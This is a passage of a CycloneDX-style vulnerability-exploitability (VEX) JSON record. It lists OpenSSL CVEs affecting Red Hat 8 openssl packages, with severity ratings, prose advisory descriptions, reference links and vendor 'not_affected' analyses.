          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-42766",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        476
      ],
      "description": "Issue summary: A specially crafted password-encrypted CMS message\ncan trigger a NULL pointer dereference during CMS decryption.\n\nImpact summary: This NULL pointer dereference leads to an application crash\nand a Denial of Service.\n\nThe CMS PasswordRecipientInfo.keyDerivationAlgorithm field is defined as\nOPTIONAL in the ASN.1 specification and may therefore be absent in specially\ncrafted inputs. During the password-based CMS decryption the OpenSSL\nCMS implementation dereferences this field without first checking whether it\nwas present.\n\nAn attacker who supplies such a CMS message to an application performing\npassword-based CMS decryption can trigger an application crash, leading to\na Denial of Service.\n\nApplications that process password-encrypted CMS messages may be affected.\n\nThe FIPS modules in 4.0, 3.6, 3.5, 3.4, and 3.0 are not affected by this\nissue, as the affected code is outside the OpenSSL FIPS module boundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-42766"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:25237"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:25239"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-42766"
        },
        {
          "url": "https://bugzilla.redhat.com/2481879"
        },
        {
          "url": "https://bugzilla.redhat.com/2481880"
        },
        {
          "url": "https://bugzilla.redhat.com/2481881"
        },
        {
          "url": "https://bugzilla.redhat.com/2481882"
        },
        {
          "url": "https://bugzilla.redhat.com/2481884"
        },
        {
          "url": "https://bugzilla.redhat.com/2481885"
        },
        {
          "url": "https://bugzilla.redhat.com/2481887"
        },
        {
          "url": "https://bugzilla.redhat.com/2481890"
        },
        {
          "url": "https://bugzilla.redhat.com/2481891"
        },
        {
          "url": "https://bugzilla.redhat.com/2481892"
        },
        {
          "url": "https://bugzilla.redhat.com/2481893"
        },
        {
          "url": "https://bugzilla.redhat.com/2481894"
        },
        {
          "url": "https://bugzilla.redhat.com/2481896"
        },
        {
          "url": "https://bugzilla.redhat.com/2481897"
        },
        {
          "url": "https://bugzilla.redhat.com/2481898"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481879"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481880"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481881"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481882"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481884"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481885"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481887"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481890"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481892"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481893"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481894"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481896"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481897"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481898"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34180"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34181"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34182"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34183"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42764"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42766"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42767"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42768"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42769"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42770"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45445"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45446"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45447"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-7383"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9076"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-25237.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:25239"
        },
        {
          "url": "https://github.com/advisories/GHSA-58mv-qqmv-gqgv"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/056d06c1918fafbb98c1c85a02e4c47cc4e199ce"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/12bc26ffb3a2be728c9b86e1cae277de5b33dfa4"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/3ff64913615d648cfbb6a6f1cf5529ae7ea829d7"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/ab52d88cb5374876d59aee3c91f9e4ccce2b7ce4"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/da26f368732b83e40e9d356fe61c3d3aaab6d2e8"
        },
        {
          "url": "https://github.com/openssl/security/commit/056d06c1918fafbb98c1c85a02e4c47cc4e199ce"
        },
        {
          "url": "https://github.com/openssl/security/commit/12bc26ffb3a2be728c9b86e1cae277de5b33dfa4"
        },
        {
          "url": "https://github.com/openssl/security/commit/3ff64913615d648cfbb6a6f1cf5529ae7ea829d7"
        },
        {
          "url": "https://github.com/openssl/security/commit/ab52d88cb5374876d59aee3c91f9e4ccce2b7ce4"
        },
        {
          "url": "https://github.com/openssl/security/commit/da26f368732b83e40e9d356fe61c3d3aaab6d2e8"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-42766.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-50379.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42766"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260609.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8414-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8414-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42766"
        }
      ],
      "published": "2026-06-09T17:17:07+00:00",
      "updated": "2026-07-23T08:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-42768",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        514
      ],
      "description": "Issue summary: The CMS_decrypt and PKCS7_decrypt functions are vulnerable to\nBleichenbacher-style attack when an attacker is able to provide the CMS or\nS/MIME messages and observe the error code and/or decryption output.\n\nImpact summary: The Bleichenbacher-style attack allows an attacker to use the\nvictim's vulnerable application as a way to decrypt or sign messages with the\nvictim's private RSA key.\n\nThe attack is possible in 2 variants.\n\n1. The decryption API (CMS_decrypt(), PKCS7_decrypt()) is used without\nproviding the recipient certificate. In this case OpenSSL iterates over every\nKeyTransRecipientInfo (KTRI) without stopping at the first success.\n\nAn attacker who authors a message with two KTRI entries \u2014 the first one\nwrapping a real CEK under the victim's public key, the second with an\narbitrary probe ciphertext \u2014 obtains opportunity to iterate the 2nd KTRI to\nget a valid PKCS#1 v1.5 padding if the error code of the application is\navailable.\n\nThat is a Bleichenbacher oracle (Bleichenbacher, CRYPTO '98): an\nadaptive-chosen-ciphertext side channel from which the attacker decrypts any\nRSA ciphertext to the victim's key or forges any PKCS#1 v1.5 signature under\nit.\n\n2. When the decryption API (CMS_decrypt(), PKCS7_decrypt()) is provided with\nthe recipient certificate, and the recipient is not found, a random\nkey is substituted.\n\nAn attacker who authors a message and is able to compare both error code and\nthe result of the decryption, can mount a Bleichenbacher oracle.\n\nWe are not aware of any applications that provide a remote attacker\nan opportunity to mount an attack described in these scenarios. We consider\nthe existence of such application very unlikely, and for this reason this\nCVE has been evaluated as Low severity.\n\nTo avoid these attacks, when RSA PKCS#1 v1.5 Key Transport is in use, the\ninvoked EVP_PKEY_decrypt() will use the implicit rejection mechanism described\nin draft-irtf-cfrg-rsa-guidance. In previous OpenSSL releases the implicit\nrejection was explicitly disabled.\n\nThe implicit rejection mechanism always returns a plaintext value,\nthe symmetric key. This result is deterministic for the ciphertext and the\nprivate key.  The length of the decryption result can happen to match the\nlength of the key of the symmetric cipher that was used for the content\nencryption. When a certificate is not provided, the last RecipientInfo\nproducing a key that looks valid will be used. It may cause getting garbage\ncontent on decryption. As a proper way to deal with this a recipient\ncertificate has to be provided to identify the particular RecipientInfo for\ndecryption.\n\nThe FIPS modules in 4.0, 3.6, 3.5, and 3.4 are not affected by this issue, as\nCMS and S/MIME processing happens outside the OpenSSL FIPS module boundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-42768"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:25237"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:25239"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-42768"
        },
        {
          "url": "https://bugzilla.redhat.com/2481879"
        },
        {
          "url": "https://bugzilla.redhat.com/2481880"
        },
        {
          "url": "https://bugzilla.redhat.com/2481881"
        },
        {
          "url": "https://bugzilla.redhat.com/2481882"
        },
        {
          "url": "https://bugzilla.redhat.com/2481884"
        },
        {
          "url": "https://bugzilla.redhat.com/2481885"
        },
        {
          "url": "https://bugzilla.redhat.com/2481887"
        },
        {
          "url": "https://bugzilla.redhat.com/2481890"
        },
        {
          "url": "https://bugzilla.redhat.com/2481891"
        },
        {
          "url": "https://bugzilla.redhat.com/2481892"
        },
        {
          "url": "https://bugzilla.redhat.com/2481893"
        },
        {
          "url": "https://bugzilla.redhat.com/2481894"
        },
        {
          "url": "https://bugzilla.redhat.com/2481896"
        },
        {
          "url": "https://bugzilla.redhat.com/2481897"
        },
        {
          "url": "https://bugzilla.redhat.com/2481898"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481879"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481880"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481881"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481882"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481884"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481885"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481887"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481890"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481892"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481893"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481894"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481896"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481897"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481898"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34180"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34181"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34182"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34183"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42764"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42766"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42767"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42768"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42769"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42770"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45445"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45446"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45447"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-7383"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9076"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-25237.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:25239"
        },
        {
          "url": "https://github.com/advisories/GHSA-5m8f-m8jv-3rp3"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/a2ca7b2d73e0ffc1eae183fe6e1741dac767cb4f"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/bbb151a83041705d9d001ed2f9c12f5523e1b54d"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/dd68364107a58841c0a2546812518b65d3a23abd"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/f04b377be3d821741c86d1f4bf84dee09f3d5c3e"
        },
        {
          "url": "https://github.com/openssl/security/commit/a2ca7b2d73e0ffc1eae183fe6e1741dac767cb4f"
        },
        {
          "url": "https://github.com/openssl/security/commit/bbb151a83041705d9d001ed2f9c12f5523e1b54d"
        },
        {
          "url": "https://github.com/openssl/security/commit/dd68364107a58841c0a2546812518b65d3a23abd"
        },
        {
          "url": "https://github.com/openssl/security/commit/f04b377be3d821741c86d1f4bf84dee09f3d5c3e"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-42768.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-50379.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42768"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260609.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8414-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42768"
        }
      ],
      "published": "2026-06-09T17:17:08+00:00",
      "updated": "2026-07-23T08:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
